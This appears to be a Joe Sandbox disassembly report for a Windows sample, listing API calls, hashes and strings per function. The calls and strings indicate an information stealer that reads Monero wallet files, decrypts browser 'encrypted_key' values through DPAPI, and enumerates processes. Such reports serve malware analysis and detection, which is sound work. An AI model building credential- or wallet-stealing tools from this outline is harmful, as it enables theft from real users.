                          • Opcode ID: 33a59d5addc8aa9e12ca9501259c5ecb4220475e1b0f145cbebf264129199f89
                          • Instruction ID: e68f897518730e97829997f72da4e082462e263544c7bb15c137a409630237ad
                          • Opcode Fuzzy Hash: 33a59d5addc8aa9e12ca9501259c5ecb4220475e1b0f145cbebf264129199f89
                          • Instruction Fuzzy Hash: 57616130A00248EBDB14EFA5DD96FED7775AF40304F408029F90A6F1D1DB786A56CB5A
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0128D398,00000000,00020119,?), ref: 004140F4
                          • RegQueryValueExA.ADVAPI32(?,0128DDD8,00000000,00000000,00000000,000000FF), ref: 00414118
                          • RegCloseKey.ADVAPI32(?), ref: 00414122
                          • lstrcat.KERNEL32(?,00000000), ref: 00414147
                          • lstrcat.KERNEL32(?,0128DBE0), ref: 0041415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                          • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                          • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                          • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00417E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0127BA48,00000000,00020119,?), ref: 00417E5E
                          • RegQueryValueExA.ADVAPI32(?,0128D3D8,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00417E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                          • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                          • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                          • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                          APIs
                          • StrStrA.SHLWAPI(0128DA48,?,?,?,0041140C,?,0128DA48,00000000), ref: 0041926C
                          • lstrcpyn.KERNEL32(0064AB88,0128DA48,0128DA48,?,0041140C,?,0128DA48), ref: 00419290
                          • lstrlen.KERNEL32(?,?,0041140C,?,0128DA48), ref: 004192A7
                          • wsprintfA.USER32 ref: 004192C7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                          • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                          • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                          • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004012B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004012BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004012F5
                          • RegCloseKey.ADVAPI32(?), ref: 004012FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                          • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                          • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                          • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 0c12102a7cdd154f262930b871950fa552e11606a6e28a0f60d8dffc08638287
                          • Instruction ID: 8b2bdcace91feebb35a4b118135bf4cb05f7e48c81c90e72df72044ccdfa8b16
                          • Opcode Fuzzy Hash: 0c12102a7cdd154f262930b871950fa552e11606a6e28a0f60d8dffc08638287
                          • Instruction Fuzzy Hash: B94127B154079C5EDB218B24CDC4FFB7BF89F05308F1444EEE98A86182D2759A85CF68
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                          • ExitProcess.KERNEL32 ref: 00416755
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                          • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                          • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                          • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00418836
                          • wsprintfA.USER32 ref: 00418850
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                          • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                          • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                          • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00418D62
                          • wsprintfW.USER32 ref: 00418D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                          • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                          • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                          • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0040A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0040A6BC
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                          • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                          • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                          • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                          • lstrlen.KERNEL32(00000000), ref: 0040D698
                          • lstrlen.KERNEL32(00000000), ref: 0040D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                          • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                          • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                          • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                          • lstrlen.KERNEL32(00000000), ref: 0040D99F
                          • lstrlen.KERNEL32(00000000), ref: 0040D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                          • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                          • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                          • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                          • sA, xrefs: 00417111
                          • sA, xrefs: 004172AE, 00417179, 0041717C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 3722407311-2614523144
                          • Opcode ID: e8a1614ae27c0826006aff9a976613fec449a8654b29928f6117e4c6c67b7198
                          • Instruction ID: 129a870a3a59fbd97e4d02dfab19d553d00e22c10235de59886d0c6bfd7e61ef
                          • Opcode Fuzzy Hash: e8a1614ae27c0826006aff9a976613fec449a8654b29928f6117e4c6c67b7198
                          • Instruction Fuzzy Hash: 3F5194B0D44218ABDB24EB90DC45BEEB374AF44304F1040AEE51576281DB786EC9CF5D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 4ab20a381f2e255d8a1b8fcf552e5d20e007fe3511352cd1db8e66a2ffdb7c2b
                          • Instruction ID: aadc2ebd4ddf12cfb04e2c2f4f233bf734449d0873b802f11da9c780ad8921d9
                          • Opcode Fuzzy Hash: 4ab20a381f2e255d8a1b8fcf552e5d20e007fe3511352cd1db8e66a2ffdb7c2b
                          • Instruction Fuzzy Hash: FF4181B1D10108EFCB04EFE5D945AEEB7B4AF54704F10801EE41676291DB789A46CFAA
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                            • Part of subcall function 004099C0: LocalFree.KERNEL32(0040148F), ref: 00409A90
                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                            • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                            • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                            • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                            • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                            • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 4a62dc9678bbcd1cabf209cd892d7595286da244c6d51c9b067c14af0d769b98
                          • Instruction ID: 51515721a1a3ec885207932c39a0a70c56b110abb63bb806a73a598b0ac1e228
                          • Opcode Fuzzy Hash: 4a62dc9678bbcd1cabf209cd892d7595286da244c6d51c9b067c14af0d769b98
                          • Instruction Fuzzy Hash: D33152B5D10109ABCB04EBE4DC85AEF77B8AF48304F14452AE915B7282E7389E04CBA5
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                          • Process32First.KERNEL32(?,00000128), ref: 004186DE
                          • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • CloseHandle.KERNEL32(?), ref: 00418761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                          • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                          • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                          • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004179B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                          • wsprintfA.USER32 ref: 004179F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                          • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                          • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                          • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                          APIs
                          • __getptd.LIBCMT ref: 0041C74E
                            • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                          • __getptd.LIBCMT ref: 0041C765
                          • __amsg_exit.LIBCMT ref: 0041C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 0dee89ca1e27279cee20c61cf39372be64ae68290e804cf05a8e7f65ce69890f
                          • Instruction ID: f221cbc75ab16e387751c9b116ef15a62a105912f32ca5c84f33c5bc9026f8a6
                          • Opcode Fuzzy Hash: 0dee89ca1e27279cee20c61cf39372be64ae68290e804cf05a8e7f65ce69890f
                          • Instruction Fuzzy Hash: 72F09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                          APIs
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00414F7A
                          • lstrcat.KERNEL32(?,00421070), ref: 00414F97
                          • lstrcat.KERNEL32(?,01288BA0), ref: 00414FAB
                          • lstrcat.KERNEL32(?,00421074), ref: 00414FBD
                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                          • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                          • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                          • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96